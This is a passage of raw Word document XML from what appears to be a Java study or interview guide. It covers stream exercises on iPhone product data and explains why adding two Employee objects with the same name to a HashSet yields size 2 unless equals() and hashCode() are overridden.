          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EF3BDA"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produc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p>
    <w:p w14:paraId="5ED81D65"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il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product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iPhone 16"</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qual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oduc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Model</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EC87A1"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orEach</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p>
    <w:p w14:paraId="441C0075"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014A6199"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2. Get the product and its feature with the highest resolution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8EDCF0"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2. Product and Feature with the highest resolution:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBE9911"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produc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p>
    <w:p w14:paraId="0702D0CC"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product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bstractMap</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impleEntry</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>produc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p>
    <w:p w14:paraId="1210D301"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produc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Feature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x</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omparat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mparingIn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Featur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Resolu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orElse</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p>
    <w:p w14:paraId="2A7B81A1"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ax</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omparat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mparing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entry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ent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Valu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Resolution</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F28B86B"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fPrese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entry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roduc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nt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Ke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Feature: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nt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Value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3837C889"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1501E4"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3. Print the number of iPhone 15 and iPhone 16 count in each location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F664A9"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3. Count of iPhone15 and iPhone16 in each location:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E80A99F"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produc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p>
    <w:p w14:paraId="38F806EA"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llec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ollecto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roupingBy</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Produc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Loca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p>
    <w:p w14:paraId="1E2E03CB"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ollecto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roupingBy</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Produc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Mode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ollecto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unting</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>())))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665452D8"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orEac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oca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odelCoun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BFB08FA"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Location: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location</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789436DC"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modelCountMa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orEach</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ode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ou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p>
    <w:p w14:paraId="6909802B"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odel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count</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C86E157"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D7F99C6" w14:textId="77777777"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110E01E" w14:textId="428030B5" w:rsidR="00A96B6F" w:rsidRPr="00CE4B95"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7FCC1727" w14:textId="77777777" w:rsidR="00A96B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00A96B6F" w:rsidP="00597807">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72A371A5" w14:textId="12F5AE0F" w:rsidR="004F747E" w:rsidRPr="00CE4B95" w:rsidRDefault="004F747E" w:rsidP="0077366D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="382" w:name="_Toc196307862"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="0077366D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Given two Employee objects with the same name, determine the size of a Set after adding these objects, considering whether equals() and hashCode() are overridden in the Employee class.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="382"/>
    </w:p>
    <w:p w14:paraId="7F4E435B" w14:textId="0026502F" w:rsidR="00CF1FBB" w:rsidRPr="00CE4B95" w:rsidRDefault="004F747E" w:rsidP="00CF1FBB">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00CF1FBB" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>We have 2 Employee object and if I add these objects in Set and check for the size then what will be the output 1 or 2?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787B09B1" w14:textId="77777777" w:rsidR="00CF1FBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00CF1FBB" w:rsidP="00CF1FBB">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>Employee e1 = new Employee(“Swapnil”);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034BBEE8" w14:textId="232FD373" w:rsidR="004F747E" w:rsidRPr="00CE4B95" w:rsidRDefault="00CF1FBB" w:rsidP="00CF1FBB">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>Employee e2 = new Employee(“Swapnil”);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047F64BE" w14:textId="13424768" w:rsidR="00597807" w:rsidRPr="00CE4B95" w:rsidRDefault="00597807" w:rsidP="00666C0C">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this scenario, if you add the two Employee objects into a Set, the output for the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>size of the set</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will depend on how the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Employee class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is implemented, specifically how </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>equality</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is defined.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264876C3" w14:textId="77777777" w:rsidR="00597807" w:rsidRPr="00CE4B95" w:rsidRDefault="00597807" w:rsidP="0059780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fault Behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4500D0FC" w14:textId="77777777" w:rsidR="00597807" w:rsidRPr="00CE4B95" w:rsidRDefault="00597807" w:rsidP="0059780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y default, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java’s Set</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like HashSet) uses the equals() and hashCode() methods to determine whether two objects are equal. If these methods are not overridden, two different objects with the same data are considered </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>different</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by default because the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Object class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>'s equals() method compares memory references, not the content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5E2B96" w14:textId="77777777" w:rsidR="00597807" w:rsidRPr="00CE4B95" w:rsidRDefault="00597807" w:rsidP="0059780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your case, the Employee class has no custom implementation of equals() and hashCode(), so even though e1 and e2 have the same name ("Swapnil"), they are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>considered different objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by the Set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BB03BD" w14:textId="77777777" w:rsidR="00597807" w:rsidRPr="00CE4B95" w:rsidRDefault="00597807" w:rsidP="0059780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us, if you add both e1 and e2 to a Set, it will </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not remove duplicates</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> based on the content, and the set will contain both objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8B593A" w14:textId="77777777" w:rsidR="00597807" w:rsidRPr="00CE4B95" w:rsidRDefault="00597807" w:rsidP="0059780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1726680C" w14:textId="77777777" w:rsidR="00B87649" w:rsidRPr="00CE4B95" w:rsidRDefault="00B87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4982167"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Se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employeeSe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Set</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37725852" w14:textId="77777777" w:rsidR="00B87649" w:rsidRPr="00CE4B95" w:rsidRDefault="00B87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4982167"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>employeeSe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wapnil"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C4F1D8" w14:textId="4F5A1974" w:rsidR="00B87649" w:rsidRPr="00CE4B95" w:rsidRDefault="00B87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4982167"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>employeeSe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wapnil"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155046C3" w14:textId="77777777" w:rsidR="00597807" w:rsidRPr="00CE4B95" w:rsidRDefault="00597807" w:rsidP="00597807">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43B7676E" w14:textId="77777777" w:rsidR="00597807" w:rsidRPr="00CE4B95" w:rsidRDefault="00597807" w:rsidP="0059780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employeeSet.size());  // Output will be 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E07B077" w14:textId="77777777" w:rsidR="00597807" w:rsidRPr="00CE4B95" w:rsidRDefault="00597807" w:rsidP="0059780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y?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3809A657" w14:textId="77777777" w:rsidR="00597807" w:rsidRPr="00CE4B95" w:rsidRDefault="00597807" w:rsidP="0059780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y default, equals() and hashCode() compare memory addresses (references), so e1 and e2 are considered </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>distinct objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653F1AAA" w14:textId="77777777" w:rsidR="00597807" w:rsidRPr="00CE4B95" w:rsidRDefault="00597807" w:rsidP="0059780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et will allow both e1 and e2 to be added because it does not find them equal based on the default implementation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EEDB67" w14:textId="77777777" w:rsidR="00597807" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0059780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6EA9401">
          <v:rect id="_x0000_i1901" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2663CA9F" w14:textId="77777777" w:rsidR="00597807" w:rsidRPr="00CE4B95" w:rsidRDefault="00597807" w:rsidP="0059780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ustom Implementation of equals() and hashCode():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D61052F" w14:textId="77777777" w:rsidR="00597807" w:rsidRPr="00CE4B95" w:rsidRDefault="00597807" w:rsidP="0059780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you want the Set to treat e1 and e2 as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>equal</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (because they have the same name), you need to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>override equals() and hashCode()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the Employee class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA655E4" w14:textId="77777777" w:rsidR="00682956" w:rsidRPr="00CE4B95"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A39B08B" w14:textId="77777777" w:rsidR="00682956" w:rsidRPr="00CE4B95"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02369E7D" w14:textId="77777777" w:rsidR="00682956" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046ADAA9" w14:textId="77777777" w:rsidR="00682956" w:rsidRPr="00CE4B95"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253302F" w14:textId="77777777" w:rsidR="00682956" w:rsidRPr="00CE4B95"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1C6C3AAE" w14:textId="77777777" w:rsidR="00682956" w:rsidRPr="00CE4B95"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F13F7F7" w14:textId="77777777" w:rsidR="00682956" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1CC39E" w14:textId="77777777" w:rsidR="00682956" w:rsidRPr="00CE4B95"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verride equals and hashCode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36895074" w14:textId="77777777" w:rsidR="00682956" w:rsidRPr="00CE4B95"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4CE033A1" w14:textId="77777777" w:rsidR="00682956" w:rsidRPr="00CE4B95"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boolean</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> equals</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Objec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02977E3" w14:textId="77777777" w:rsidR="00682956" w:rsidRPr="00CE4B95"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thi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ue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E9157B" w14:textId="77777777" w:rsidR="00682956" w:rsidRPr="00CE4B95"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obj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getClas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Clas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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E9FD9A" w14:textId="77777777" w:rsidR="00682956" w:rsidRPr="00CE4B95"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> employe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obj</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
